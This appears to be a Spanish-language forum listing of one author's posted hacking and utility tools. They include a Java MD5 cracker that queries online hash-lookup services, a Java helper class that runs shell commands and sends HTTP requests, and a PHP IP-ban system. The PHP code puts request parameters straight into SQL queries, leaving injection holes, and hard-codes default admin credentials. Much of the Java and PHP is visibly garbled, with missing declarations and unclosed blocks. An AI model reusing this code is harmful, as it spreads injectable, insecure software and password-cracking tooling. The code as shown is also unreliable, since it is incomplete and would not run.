31
Programación / Java / [Java] SQLI Scanner 0.4
en: 5 Marzo 2016, 16:15 pm
Un simple programa en Java para buscar paginas vulnerables a SQLI usando Google o Bing.
Una imagen :
Si lo quieren bajar el proyecto con el codigo fuente lo pueden hacer de
aca .
32
Programación / Java / [Java] LocateIP 0.2
en: 20 Febrero 2016, 15:51 pm
Un simple programa en Java para localizar una IP y sus DNS.
Una imagen :
Si quieren bajar el proyecto con el codigo y el programa final lo pueden hacer de
aca .
33
Programación / Java / [Java] HTTP FingerPrinting 0.2
en: 5 Febrero 2016, 15:11 pm
Un simple programa en Java para realizar HTTP FingerPrinting a una pagina.
Una imagen :
Si lo quieren bajar el proyecto con el codigo fuente lo pueden hacer de
aca .
34
Programación / Java / [Java] MD5 Cracker 0.2
en: 22 Enero 2016, 16:18 pm
Un simple programa en Java para crackear un hash MD5 mediante 3 servicios online.
Una imagen :
El codigo :
// MD5 Cracker 0.2
// (C) Doddy Hackman 2015
// Credits : Based in the services ...
// http://md5online.net/index.php
// http://md5.my-addr.com/md5_decrypt-md5_cracker_online/md5_decoder_tool.php
// http://md5decryption.com/index.php
package MD5_Cracker ;
import java.util.regex.Matcher ;
import java.util.regex.Pattern ;
import javax.swing.JOptionPane ;
import javax.swing.SwingUtilities ;
import org.jvnet.substance.SubstanceLookAndFeel ;
/**
*
* @author Doddy
*/
public class Home
extends javax.
swing .
JFrame {
/**
* Creates new form Home
*/
public Home( ) {
initComponents( ) ;
}
/**
* This method is called from within the constructor to initialize the form.
* WARNING: Do NOT modify this code. The content of this method is always
* regenerated by the Form Editor.
*/
@SuppressWarnings( "unchecked" )
// <editor-fold defaultstate="collapsed" desc="Generated Code">
private void initComponents( ) {
jPanel3
= new javax.
swing .
JPanel ( ) ; jPanel1
= new javax.
swing .
JPanel ( ) ; btnCrack
= new javax.
swing .
JButton ( ) ; jPanel2
= new javax.
swing .
JPanel ( ) ; jLabel1
= new javax.
swing .
JLabel ( ) ; jLabel2
= new javax.
swing .
JLabel ( ) ; jLabel3
= new javax.
swing .
JLabel ( ) ; jPanel4
= new javax.
swing .
JPanel ( ) ; status
= new javax.
swing .
JLabel ( ) ;
javax.swing .GroupLayout jPanel3Layout = new javax.swing .GroupLayout ( jPanel3) ;
jPanel3.setLayout ( jPanel3Layout) ;
jPanel3Layout.setHorizontalGroup (
jPanel3Layout.createParallelGroup ( javax.swing .GroupLayout .Alignment .LEADING )
.
addGap ( 0 ,
100 ,
Short .
MAX_VALUE ) ) ;
jPanel3Layout.setVerticalGroup (
jPanel3Layout.createParallelGroup ( javax.swing .GroupLayout .Alignment .LEADING )
.
addGap ( 0 ,
100 ,
Short .
MAX_VALUE ) ) ;
setTitle( "MD5 Cracker 0.2 (C) Doddy Hackman 2015" ) ;
setResizable( false ) ;
btnCrack.setText ( "Crack" ) ;
public void actionPerformed
( java.
awt .
event .
ActionEvent evt
) { btnCrackActionPerformed( evt) ;
}
} ) ;
javax.swing .GroupLayout jPanel1Layout = new javax.swing .GroupLayout ( jPanel1) ;
jPanel1.setLayout ( jPanel1Layout) ;
jPanel1Layout.setHorizontalGroup (
jPanel1Layout.createParallelGroup ( javax.swing .GroupLayout .Alignment .LEADING )
.addGroup ( jPanel1Layout.createSequentialGroup ( )
.addContainerGap ( )
.addComponent ( txtMD5, javax.swing .GroupLayout .PREFERRED_SIZE , 280 , javax.swing .GroupLayout .PREFERRED_SIZE )
.addPreferredGap ( javax.swing .LayoutStyle .ComponentPlacement .RELATED )
.
addComponent ( btnCrack, javax.
swing .
GroupLayout .
DEFAULT_SIZE ,
75 ,
Short .
MAX_VALUE ) .addContainerGap ( ) )
) ;
jPanel1Layout.setVerticalGroup (
jPanel1Layout.createParallelGroup ( javax.swing .GroupLayout .Alignment .LEADING )
.addGroup ( javax.swing .GroupLayout .Alignment .TRAILING , jPanel1Layout.createSequentialGroup ( )
.
addContainerGap ( javax.
swing .
GroupLayout .
DEFAULT_SIZE ,
Short .
MAX_VALUE ) .addGroup ( jPanel1Layout.createParallelGroup ( javax.swing .GroupLayout .Alignment .BASELINE )
.addComponent ( txtMD5, javax.swing .GroupLayout .PREFERRED_SIZE , javax.swing .GroupLayout .DEFAULT_SIZE , javax.swing .GroupLayout .PREFERRED_SIZE )
.addComponent ( btnCrack) )
.addContainerGap ( ) )
) ;
jLabel1.setText ( "md5online.net ->" ) ;
jLabel2.setText ( "md5.my-addr.co ->" ) ;
jLabel3.setText ( "md5decryption.com ->" ) ;
txtPassword1.setEditable ( false ) ;
txtPassword2.setEditable ( false ) ;
txtPassword3.setEditable ( false ) ;
javax.swing .GroupLayout jPanel2Layout = new javax.swing .GroupLayout ( jPanel2) ;
jPanel2.setLayout ( jPanel2Layout) ;
jPanel2Layout.setHorizontalGroup (
jPanel2Layout.createParallelGroup ( javax.swing .GroupLayout .Alignment .LEADING )
.addGroup ( jPanel2Layout.createSequentialGroup ( )
.addGap ( 28 , 28 , 28 )
.addGroup ( jPanel2Layout.createParallelGroup ( javax.swing .GroupLayout .Alignment .LEADING , false )
.addGroup ( jPanel2Layout.createSequentialGroup ( )
.addComponent ( jLabel3)
.addPreferredGap ( javax.swing .LayoutStyle .ComponentPlacement .UNRELATED )
.addComponent ( txtPassword3) )
.addGroup ( javax.swing .GroupLayout .Alignment .TRAILING , jPanel2Layout.createSequentialGroup ( )
.addComponent ( jLabel2)
.addPreferredGap ( javax.swing .LayoutStyle .ComponentPlacement .UNRELATED )
.addComponent ( txtPassword2) )
.addGroup ( javax.swing .GroupLayout .Alignment .TRAILING , jPanel2Layout.createSequentialGroup ( )
.addComponent ( jLabel1)
.addPreferredGap ( javax.swing .LayoutStyle .ComponentPlacement .UNRELATED )
.addComponent ( txtPassword1, javax.swing .GroupLayout .PREFERRED_SIZE , 229 , javax.swing .GroupLayout .PREFERRED_SIZE ) ) )
.
addContainerGap ( javax.
swing .
GroupLayout .
DEFAULT_SIZE ,
Short .
MAX_VALUE ) ) ) ;
jPanel2Layout.setVerticalGroup (
jPanel2Layout.createParallelGroup ( javax.swing .GroupLayout .Alignment .LEADING )
.addGroup ( jPanel2Layout.createSequentialGroup ( )
.addContainerGap ( )
.addGroup ( jPanel2Layout.createParallelGroup ( javax.swing .GroupLayout .Alignment .BASELINE )
.addComponent ( jLabel1)
.addComponent ( txtPassword1, javax.swing .GroupLayout .PREFERRED_SIZE , javax.swing .GroupLayout .DEFAULT_SIZE , javax.swing .GroupLayout .PREFERRED_SIZE ) )
.addPreferredGap ( javax.swing .LayoutStyle .ComponentPlacement .UNRELATED )
.addGroup ( jPanel2Layout.createParallelGroup ( javax.swing .GroupLayout .Alignment .BASELINE )
.addComponent ( jLabel2)
.addComponent ( txtPassword2, javax.swing .GroupLayout .PREFERRED_SIZE , javax.swing .GroupLayout .DEFAULT_SIZE , javax.swing .GroupLayout .PREFERRED_SIZE ) )
.addPreferredGap ( javax.swing .LayoutStyle .ComponentPlacement .UNRELATED )
.addGroup ( jPanel2Layout.createParallelGroup ( javax.swing .GroupLayout .Alignment .BASELINE )
.addComponent ( jLabel3)
.addComponent ( txtPassword3, javax.swing .GroupLayout .PREFERRED_SIZE , javax.swing .GroupLayout .DEFAULT_SIZE , javax.swing .GroupLayout .PREFERRED_SIZE ) )
.
addContainerGap ( 15 ,
Short .
MAX_VALUE ) ) ) ;
status.setText ( "[+] Program Ready" ) ;
javax.swing .GroupLayout jPanel4Layout = new javax.swing .GroupLayout ( jPanel4) ;
jPanel4.setLayout ( jPanel4Layout) ;
jPanel4Layout.setHorizontalGroup (
jPanel4Layout.createParallelGroup ( javax.swing .GroupLayout .Alignment .LEADING )
.addGroup ( jPanel4Layout.createSequentialGroup ( )
.addComponent ( status)
.
addGap ( 0 ,
0 ,
Short .
MAX_VALUE ) ) ) ;
jPanel4Layout.setVerticalGroup (
jPanel4Layout.createParallelGroup ( javax.swing .GroupLayout .Alignment .LEADING )
.addGroup ( javax.swing .GroupLayout .Alignment .TRAILING , jPanel4Layout.createSequentialGroup ( )
.
addGap ( 0 ,
0 ,
Short .
MAX_VALUE ) .addComponent ( status) )
) ;
javax.swing .GroupLayout layout = new javax.swing .GroupLayout ( getContentPane( ) ) ;
getContentPane( ) .setLayout ( layout) ;
layout.setHorizontalGroup (
layout.createParallelGroup ( javax.swing .GroupLayout .Alignment .LEADING )
.addGroup ( layout.createSequentialGroup ( )
.addContainerGap ( )
.addGroup ( layout.createParallelGroup ( javax.swing .GroupLayout .Alignment .LEADING )
.
addComponent ( jPanel2, javax.
swing .
GroupLayout .
DEFAULT_SIZE , javax.
swing .
GroupLayout .
DEFAULT_SIZE ,
Short .
MAX_VALUE ) .
addComponent ( jPanel1, javax.
swing .
GroupLayout .
DEFAULT_SIZE , javax.
swing .
GroupLayout .
DEFAULT_SIZE ,
Short .
MAX_VALUE ) ) .addContainerGap ( ) )
.
addComponent ( jPanel4, javax.
swing .
GroupLayout .
Alignment .
TRAILING , javax.
swing .
GroupLayout .
DEFAULT_SIZE , javax.
swing .
GroupLayout .
DEFAULT_SIZE ,
Short .
MAX_VALUE ) ) ;
layout.setVerticalGroup (
layout.createParallelGroup ( javax.swing .GroupLayout .Alignment .LEADING )
.addGroup ( layout.createSequentialGroup ( )
.
addContainerGap ( javax.
swing .
GroupLayout .
DEFAULT_SIZE ,
Short .
MAX_VALUE ) .addComponent ( jPanel1, javax.swing .GroupLayout .PREFERRED_SIZE , javax.swing .GroupLayout .DEFAULT_SIZE , javax.swing .GroupLayout .PREFERRED_SIZE )
.addPreferredGap ( javax.swing .LayoutStyle .ComponentPlacement .RELATED )
.addComponent ( jPanel2, javax.swing .GroupLayout .PREFERRED_SIZE , javax.swing .GroupLayout .DEFAULT_SIZE , javax.swing .GroupLayout .PREFERRED_SIZE )
.addPreferredGap ( javax.swing .LayoutStyle .ComponentPlacement .RELATED )
.addComponent ( jPanel4, javax.swing .GroupLayout .PREFERRED_SIZE , javax.swing .GroupLayout .DEFAULT_SIZE , javax.swing .GroupLayout .PREFERRED_SIZE )
.addGap ( 0 , 0 , 0 ) )
) ;
pack( ) ;
} // </editor-fold>
private void btnCrackActionPerformed
( java.
awt .
event .
ActionEvent evt
) {
DH_Tools tools = new DH_Tools( ) ;
if ( "" .equals ( txtMD5.getText ( ) ) ) {
} else {
status.setText ( "[+] Cracking ..." ) ;
String md5
= txtMD5.
getText ( ) ;
String code1
= tools.
tomar ( "http://md5online.net/index.php" ,
"pass=" + md5
+ "&option=hash2text&send=Submit" ) ;
Pattern search = null ;
Matcher regex = null ;
search = Pattern.compile ( "pass : <b>(.*?)<\\ /b>" ) ;
regex = search.matcher ( code1) ;
if ( regex.find ( ) ) {
txtPassword1.setText ( regex.group ( 1 ) ) ;
} else {
txtPassword1.setText ( "Not Found" ) ;
}
String code2
= tools.
tomar ( "http://md5.my-addr.com/md5_decrypt-md5_cracker_online/md5_decoder_tool.php" ,
"md5=" + md5
) ;
search = Pattern.compile ( "<span class='middle_title'>Hashed string<\\ /span>: (.*?)<\\ /div>" ) ;
regex = search.matcher ( code2) ;
if ( regex.find ( ) ) {
txtPassword2.setText ( regex.group ( 1 ) ) ;
} else {
txtPassword2.setText ( "Not Found" ) ;
}
String code3
= tools.
tomar ( "http://md5decryption.com/index.php" ,
"hash=" + md5
+ "&submit=Decrypt It!" ) ;
search = Pattern.compile ( "Decrypted Text: <\\ /b>(.*?)<\\ /font>" ) ;
regex = search.matcher ( code3) ;
if ( regex.find ( ) ) {
txtPassword3.setText ( regex.group ( 1 ) ) ;
} else {
txtPassword3.setText ( "Not Found" ) ;
}
status.setText ( "[+] Finished" ) ;
}
}
/**
* @param args the command line arguments
*/
public static void main
( String args
[ ] ) { /* Set the Nimbus look and feel */
//<editor-fold defaultstate="collapsed" desc=" Look and feel setting code (optional) ">
/* If Nimbus (introduced in Java SE 6) is not available, stay with the default look and feel.
* For details see http://download.oracle.com/javase/tutorial/uiswing/lookandfeel/plaf.html
*/
try {
if ( "Nimbus" .equals ( info.getName ( ) ) ) {
javax.
swing .
UIManager .
setLookAndFeel ( info.
getClassName ( ) ) ; break ;
}
}
java.util .logging .Logger .getLogger ( Home.class .getName ( ) ) .log ( java.util .logging .Level .SEVERE , null , ex) ;
java.util .logging .Logger .getLogger ( Home.class .getName ( ) ) .log ( java.util .logging .Level .SEVERE , null , ex) ;
java.util .logging .Logger .getLogger ( Home.class .getName ( ) ) .log ( java.util .logging .Level .SEVERE , null , ex) ;
java.util .logging .Logger .getLogger ( Home.class .getName ( ) ) .log ( java.util .logging .Level .SEVERE , null , ex) ;
}
//</editor-fold>
/* Create and display the form */
Home.setDefaultLookAndFeelDecorated ( true ) ;
String skin
= "org.jvnet.substance.skin.RavenGraphiteGlassSkin" ; SubstanceLookAndFeel.setSkin ( skin) ;
SubstanceLookAndFeel.setCurrentWatermark ( "org.jvnet.substance.watermark.SubstanceMetalWallWatermark" ) ;
public void run( ) {
new Home( ) .setVisible ( true ) ;
}
} ) ;
}
// Variables declaration - do not modify
private javax.
swing .
JButton btnCrack
; private javax.
swing .
JLabel jLabel1
; private javax.
swing .
JLabel jLabel2
; private javax.
swing .
JLabel jLabel3
; private javax.
swing .
JPanel jPanel1
; private javax.
swing .
JPanel jPanel2
; private javax.
swing .
JPanel jPanel3
; private javax.
swing .
JPanel jPanel4
; private javax.
swing .
JLabel status
; // End of variables declaration
}
// The End ?
Si quieren bajar el programa lo pueden hacer de
aca .
35
Programación / Java / [Java] Class DH Tools 0.2
en: 15 Enero 2016, 16:21 pm
Mi primer clase en Java , se llama DH Tools y tiene las siguientes opciones :
Realizar una peticion GET y guardar el contenido Realizar una peticion POST y guardar el contenido Crear o escribir archivos Leer archivos Ejecutar comandos y leer su respuesta HTTP FingerPrinting Leer el codigo de respuesta de una URL Borrar repetidos en un ArrayList Cortar las URL en un ArrayList a partir del query Split casero xD Descargar archivos Capturar el archivo de una URL URI Split MD5 Encode MD5 File Get IP El codigo de la clase :
// Class : DH Tools
// Version : 0.2
// (C) Doddy Hackman 2015
// Functions :
//
//public String toma(String link)
//public String tomar(String pagina, String data)
//public void savefile(String ruta, String texto)
//public String read_file(String ruta)
//public String console(String command)
//public String httpfinger(String target)
//public Integer response_code(String page)
//public ArrayList repes(ArrayList array)
//public ArrayList cortar(ArrayList array)
//public String regex(String code, String deaca, String hastaaca)
//public Boolean download(String url, File savefile)
//public String extract_file_by_url(String url)
//public String uri_split(String link, String opcion)
//public String md5_encode(String text)
//public String md5_file(String file)
//public String get_ip(String hostname)
//
package dhtools ;
import java.io.* ;
import java.net.* ;
import java.nio.channels.Channels ;
import java.nio.channels.ReadableByteChannel ;
import java.util.ArrayList ;
import java.util.Scanner ;
import java.util.regex.Matcher ;
import java.util.regex.Pattern ;
import java.security.* ;
public class DH_Tools {
try {
nave.setRequestProperty ( "User-Agent" , "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0" ) ;
while ( ( re = leyendo.readLine ( ) ) != null ) {
conte.append ( re) ;
}
leyendo.close ( ) ;
//
}
return conte.toString ( ) ;
}
// Credits : Function based in http://www.mkyong.com/java/how-to-send-http-request-getpost-in-java/
try {
URL url_now
= new URL ( pagina
) ;
nave.setRequestMethod ( "POST" ) ;
nave.setRequestProperty ( "User-Agent" , "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0" ) ;
nave.setDoOutput ( true ) ;
send.writeBytes ( data) ;
send.flush ( ) ;
send.close ( ) ;
while ( ( linea = leyendo.readLine ( ) ) != null ) {
code.append ( linea) ;
}
leyendo.close ( ) ;
respuesta = code.toString ( ) ;
//
}
return respuesta;
}
try {
archivo
= new File ( ruta
) ;
if ( ! archivo.exists ( ) ) {
archivo.createNewFile ( ) ;
}
escribir.write ( texto) ;
escribir.flush ( ) ;
escribir.close ( ) ;
//
}
}
try {
Scanner leyendo
= new Scanner
( new FileReader ( ruta
) ) ; contenido = leyendo.next ( ) ;
//
}
return contenido;
}
try {
proceso.waitFor ( ) ;
while ( ( linea = leyendo.readLine ( ) ) != null ) {
code.append ( linea) ;
}
contenido = code.toString ( ) ;
//
}
return contenido;
}
//http://www.mkyong.com/java/how-to-get-http-response-header-in-java/
try {
String server
= nave.
getHeaderField ( "Server" ) ; String etag
= nave.
getHeaderField ( "ETag" ) ; String content_length
= nave.
getHeaderField ( "Content-Length" ) ; String expires
= nave.
getHeaderField ( "Expires" ) ; String last_modified
= nave.
getHeaderField ( "Last-Modified" ) ; String connection
= nave.
getHeaderField ( "Connection" ) ; String powered
= nave.
getHeaderField ( "X-Powered-By" ) ; String pragma
= nave.
getHeaderField ( "Pragma" ) ; String cache_control
= nave.
getHeaderField ( "Cache-Control" ) ; String date
= nave.
getHeaderField ( "Date" ) ; String vary
= nave.
getHeaderField ( "Vary" ) ; String content_type
= nave.
getHeaderField ( "Content-Type" ) ; String accept_ranges
= nave.
getHeaderField ( "Accept-Ranges" ) ;
if ( server != null ) {
resultado += "[+] Server : " + server + "\n " ;
}
if ( etag != null ) {
resultado += "[+] E-tag : " + etag + "\n " ;
}
if ( content_length != null ) {
resultado += "[+] Content-Length : " + content_length + "\n " ;
}
if ( expires != null ) {
resultado += "[+] Expires : " + expires + "\n " ;
}
if ( last_modified != null ) {
resultado += "[+] Last Modified : " + last_modified + "\n " ;
}
if ( connection != null ) {
resultado += "[+] Connection : " + connection + "\n " ;
}
if ( powered != null ) {
resultado += "[+] Powered : " + powered + "\n " ;
}
if ( pragma != null ) {
resultado += "[+] Pragma : " + pragma + "\n " ;
}
if ( cache_control != null ) {
resultado += "[+] Cache control : " + cache_control + "\n " ;
}
if ( date != null ) {
resultado += "[+] Date : " + date + "\n " ;
}
if ( vary != null ) {
resultado += "[+] Vary : " + vary + "\n " ;
}
if ( content_type != null ) {
resultado += "[+] Content-Type : " + content_type + "\n " ;
}
if ( accept_ranges != null ) {
resultado += "[+] Accept Ranges : " + accept_ranges + "\n " ;
}
//
}
return resultado;
}
try {
nave2.setRequestProperty ( "User-Agent" , "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0" ) ;
response = nave2.getResponseCode ( ) ;
response = 404 ;
}
return response;
}
Object [ ] listando
= array.
toArray ( ) ; for ( Object item
: listando
) { if ( array.indexOf ( item) != array.lastIndexOf ( item) ) {
array.remove ( array.lastIndexOf ( item) ) ;
}
}
return array;
}
for ( int i = 0 ; i < array.size ( ) ; i++ ) {
Pattern regex1 = null ;
Matcher regex2 = null ;
regex1 = Pattern.compile ( "(.*?)=(.*?)" ) ;
regex2 = regex1.matcher ( code) ;
if ( regex2.find ( ) ) {
array2.add ( regex2.group ( 1 ) + "=" ) ;
}
}
return array2;
}
Pattern regex1 = null ;
Matcher regex2 = null ;
regex1 = Pattern.compile ( deaca + "(.*?)" + hastaaca) ;
regex2 = regex1.matcher ( code) ;
if ( regex2.find ( ) ) {
resultado = regex2.group ( 1 ) ;
}
return resultado;
}
// Credits : Based on http://stackoverflow.com/questions/921262/how-to-download-and-save-a-file-from-internet-using-java
// Thanks to Brian Risk
try {
URL download_page
= new URL ( url
) ; ReadableByteChannel down1 = Channels.newChannel ( download_page.openStream ( ) ) ;
down2.
getChannel ( ) .
transferFrom ( down1,
0 ,
Long .
MAX_VALUE ) ; down1.close ( ) ;
down2.close ( ) ;
return true ;
return false ;
}
}
return url.substring ( url.lastIndexOf ( '/' ) + 1 ) ;
}
try {
if ( opcion == "protocol" ) {
resultado = url.getProtocol ( ) ;
} else if ( opcion == "authority" ) {
resultado = url.getAuthority ( ) ;
} else if ( opcion == "host" ) {
resultado = url.getHost ( ) ;
} else if ( opcion == "port" ) {
resultado
= String .
valueOf ( url.
getPort ( ) ) ; } else if ( opcion == "path" ) {
resultado = url.getPath ( ) ;
} else if ( opcion == "query" ) {
resultado = url.getQuery ( ) ;
} else if ( opcion == "filename" ) {
resultado = url.getFile ( ) ;
} else if ( opcion == "ref" ) {
resultado = url.getRef ( ) ;
} else {
resultado = "Error" ;
}
//
}
return resultado;
}
// Credits : Based on http://www.avajava.com/tutorials/lessons/how-do-i-generate-an-md5-digest-for-a-string.html
try {
generate.update ( text.getBytes ( ) ) ;
byte [ ] result = generate.digest ( ) ;
for ( byte line : result) {
string_now.
append ( String .
format ( "%02x" , line
& 0xff
) ) ; }
//
}
return string_now.toString ( ) ;
}
//Credits : Based on http://stackoverflow.com/questions/304268/getting-a-files-md5-checksum-in-java
// Thanks to
try {
byte [ ] bytes_now = new byte [ 1024 ] ;
int now_now = 0 ;
while ( ( now_now = file_now.read ( bytes_now) ) != - 1 ) {
convert.update ( bytes_now, 0 , now_now) ;
} ;
byte [ ] converting = convert.digest ( ) ;
for ( int i = 0 ; i < converting.length ; i++ ) {
result.
append ( Integer .
toString ( ( converting
[ i
] & 0xff
) + 0x100,
16 ) .
substring ( 1 ) ) ; }
resultado = result.toString ( ) ;
//
}
return resultado;
}
try {
resultado = getting_ip.getHostAddress ( ) ;
//
}
return resultado;
}
}
// The End ?
Ejemplos de uso :
package dhtools ;
import java.util.ArrayList ;
import java.util.Collections ;
public class Main {
public static void main
( String [ ] args
) { DH_Tools tools = new DH_Tools( ) ;
//String codigo = tools.toma("http://localhost/");
//String codigo = tools.tomar("http://localhost/login.php", "usuario=test&password=dsdsads&control=Login");
//tools.savefile("c:/xampp/texto.txt","texto");
//String codigo = tools.read_file("c:/xampp/texto.txt");
//String codigo = tools.console("ver");
//String codigo = tools.httpfinger("http://www.petardas.com");
/*
ArrayList array = new ArrayList();
Collections.addAll(array, "http://localhost/sql.php?id=dsaadsds", "b", "http://localhost/sql.php?id=dsaadsds", "c");
ArrayList array2 = tools.repes(tools.cortar(array));
for (int i = 0; i < array2.size(); i++) {
System.out.println(array2.get(i));
}
*/
//System.out.println(tools.regex("1sadasdsa2","1","2"));
//System.out.println(tools.response_code("http://www.petardas.com/"));
/*
File savefile = new File("c:/xampp/*****.avi");
if(tools.download("http://localhost/test.avi",savefile)) {
System.out.println("yeah");
}
*/
//System.out.println(tools.extract_file_by_url("http://localhost/dsaads/dsadsads/index.php"));
//System.out.println(tools.uri_split("http://localhost/index.php?id=dadsdsa","query"));
//System.out.println(tools.md5_encode("123"));
//System.out.println(tools.md5_file("c:\\xampp\\texto.txt"));
//System.out.println(tools.get_ip("www.petardas.com"));
}
}
Eso seria todo.
36
Programación / PHP / [PHP] Ban System 0.3
en: 8 Enero 2016, 19:22 pm
Un simple script en PHP para banear una IP en una pagina.
Una imagen :
Los codigos :
index.php
<?php
// Ban System 0.3
// (C) Doddy Hackman 2015
// Login
$username = "admin" ; // Edit
$password = "21232f297a57a5a743894a0e4a801fc3" ; // Edit
//
$index = "admin.php" ; // Edit
if ( isset ( $_GET [ 'poraca' ] ) ) {
echo '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Login</title>
<link rel="shortcut icon" href="images/icono.png">
<link href="style.css" rel="stylesheet" type="text/css" />
</head>
<body>
<center><br>
<div class="post">
<h3>Login</h3>
<div class="post_body">
<img src="images/login.jpg" width="562" height="440" />
<br />
<form action="" method=POST>
Username : <input type=text size=30 name=username /><br
/><br />
Password : <input type=password size=30 name=password
/><br /><br />
<input type=submit name=login style="width: 100px;"
value=Login /><br /><br />
</form>
</div>
</div>
</center>
</body>
</html>' ;
if ( isset ( $_POST [ 'login' ] ) ) {
$test_username = $_POST [ 'username' ] ;
$test_password = md5 ( $_POST [ 'password' ] ) ;
if ( $test_username == $username && $test_password == $password ) {
echo "<script>alert('Welcome idiot');</script>" ;
$ruta = "http://" . $_SERVER [ 'HTTP_HOST' ] . dirname ( $_SERVER [ 'PHP_SELF' ] ) . "/" . $index ; echo '<meta http-equiv="refresh" content="0; url=' . htmlentities ( $ruta ) . '"
/>' ;
} else {
echo "<script>alert('Fuck You');</script>" ;
}
}
} else {
echo '<meta http-equiv="refresh" content="0;
url=http://www.petardas.com" />' ;
}
// The End ?
?>
admin.php
<?php
// Ban System 0.3
// (C) Doddy Hackman 2015
// Login
$username = "admin" ; // Edit
$password = "21232f297a57a5a743894a0e4a801fc3" ; // Edit
// DB
$host = "localhost" ; // Edit
$userw = "root" ; // Edit
$passw = "" ; // Edit
$db = "ban" ; // Edit
if ( isset ( $_COOKIE [ 'login' ] ) ) {
$user = $plit [ 0 ] ;
$pass = $plit [ 1 ] ;
if ( $user == $username and $pass == $password ) {
echo '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Ban System 0.3</title>
<link href="style.css" rel="stylesheet" type="text/css" />
<link rel="shortcut icon" href="images/icono.png">
</head>
<body>
<center>' ;
echo ' <br><img src="images/ban.png" /><br><br>' ;
if ( isset ( $_POST [ 'instalar' ] ) ) {
$todo = "create table ban_system (
id int(10) UNSIGNED NOT NULL AUTO_INCREMENT,
ip TEXT NOT NULL,
PRIMARY KEY(id));
" ;
echo "<script>alert('Installed');</script>" ;
echo '<meta http-equiv="refresh" content=0;URL=>' ;
} else {
echo "<script>alert('Error');</script>" ;
}
}
echo "<title>Ban System 0.3 Administracion</title>" ;
if ( isset ( $_POST [ 'ipadd' ] ) ) {
$ipfinal = ip2long ( $_POST [ 'ipadd' ] ) ; $ipaz = $_POST [ 'ipadd' ] ;
if ( $ipfinal == - 1 || $ipfinal === FALSE ) {
echo "<script>alert('IP invalid');</script>" ;
} else {
if ( mysql_query ( "INSERT INTO ban_system (id,ip) values (NULL,'$ipaz ')" ) ) { echo "<script>alert('IP added');</script>" ;
} else {
echo "<script>alert('Error');</script>" ;
}
}
}
if ( isset ( $_GET [ 'del' ] ) ) { $id = $_GET [ 'del' ] ;
if ( @ mysql_query ( "DELETE FROM ban_system where id ='$id '" ) ) { echo "<script>alert('IP Deleted');</script>" ;
} else {
echo "<script>alert('Error');</script>" ;
}
}
echo '
<div class="post">
<h3>Add IP</h3>
<div class="post_body">' ;
echo "<br>
<form action='' method=POST>
<b>IP : </b><input type=text name=ipadd value=127.0.0.1> <input type=submit style='width: 100px;' value=Add>
</form><br>" ;
echo ' </div>
</div>' ;
$sql = "select id from ban_system" ;
echo '
<div class="post">
<div class="post_body"><br>' ;
if ( $cantidad <= 0 ) {
echo '<b>No entries found</b><br>' ;
} else {
echo '<table>
<td><b>ID</b></td><td><b>IP</b></td><td><b>Option</b></td><tr>' ;
$sen = @ mysql_query ( "select * from ban_system order by id ASC" ) ;
}
echo '</table>' ;
}
echo ' <br></div>
</div>' ;
echo "</table>
</center>
" ;
//
} else {
echo '
<div class="post">
<h3>Installer</h3>
<div class="post_body">' ;
echo "
<form action='' method=POST>
<h2>Do you want install Ban System ?</h2><br>
<input type=submit style='width: 100px;' name=instalar value=Install><br><br>
</form>" ;
echo ' </div>
</div>' ;
}
echo '
<br><h3>(C) Doddy Hackman 2015</h3><br>
</center>
</body>
</html>' ;
} else {
echo "<script>alert('Fuck You');</script>" ;
}
} else {
echo '<meta http-equiv="refresh" content="0; url=http://www.petardas.com" />' ;
}
?>
style.css
/*
==-----------------------------------==
|| Name : DH Theme ||
|| Version : 0.8 ||
|| Author : Doddy H ||
|| Description: Templante ||
|| Date : 14/1/2015 ||
==-----------------------------------==
*/
body {
background : transparent url ( "images/fondo.jpg" ) repeat scroll 0 0 ;
color : gray ;
font-family :helvetica , arial, sans-serif ;
font-size : 14px ;
text-align : center ;
}
a:link {
text-decoration : none ;
color : orange;
}
a:visited {
color : orange;
}
a:hover {
color : orange;
}
td, tr {
border-style : solid ;
border-color : gray ;
border-width : 1px ;
background : black ;
border : solid #222 2px ;
color : gray ;
font-family :helvetica , arial, sans-serif ;
font-size : 14px ;
text-align : center ;
word-wrap: break-word;
word-break:break- all;
}
input {
border-style : solid ;
border-color : gray ;
border-width : 1px ;
background : black ;
border : solid #222 2px ;
color : gray ;
font-family :helvetica , arial, sans-serif ;
font-size : 14px ;
}
.post {
background-color : black ;
color : gray ;
margin-bottom : 10px ;
width : 600px ;
word-wrap: break-word;
}
.post h3 {
background-color : black ;
color : orange;
background-color : #000 ;
border : solid #222 2px ;
-webkit-border-radius: 4px ;
-moz-border-radius: 4px ;
border-radius: 4px ;
padding : 5px 10px ;
}
.post_body {
background-color : black ;
margin : -20px 0 0 0 ;
color : white ;
background-color : #000 ;
border : solid #222 2px ;
-webkit-border-radius: 4px ;
-moz-border-radius: 4px ;
border-radius: 4px ;
padding : 5px 10px ;
}
/* The End ? */
ban.php
<?php
// Ban System 0.3
// (C) Doddy Hackman 2015
// DB
$host = "localhost" ; // Edit
$userw = "root" ; // Edit
$passw = "" ; // Edit
$db = "ban" ; // Edit
//
$texto = "Acceso Denegado" ; // Edit
$ipa = ip2long ( $_SERVER [ 'REMOTE_ADDR' ] ) ; $ip = $_SERVER [ 'REMOTE_ADDR' ] ;
if ( $ip == "::1" ) {
$ipa = 1 ;
}
if ( $ipa == - 1 || $ipa === FALSE ) {
echo "<script>alert('Good try');</script>" ;
} else {
if ( $ip == "::1" ) {
$ip = "127.0.0.1" ;
}
$re = mysql_query ( "select ip from ban_system where ip='$ip '" ) ;
echo "<center><h1>" . htmlentities ( $texto ) . "</h1></center>" ; }
}
// The End ?
?>
test.php
<?php
include ( "ban.php" ) ;
echo "aca toy" ;
?>
Si quieren bajar el programa lo pueden hacer de
aca .
37
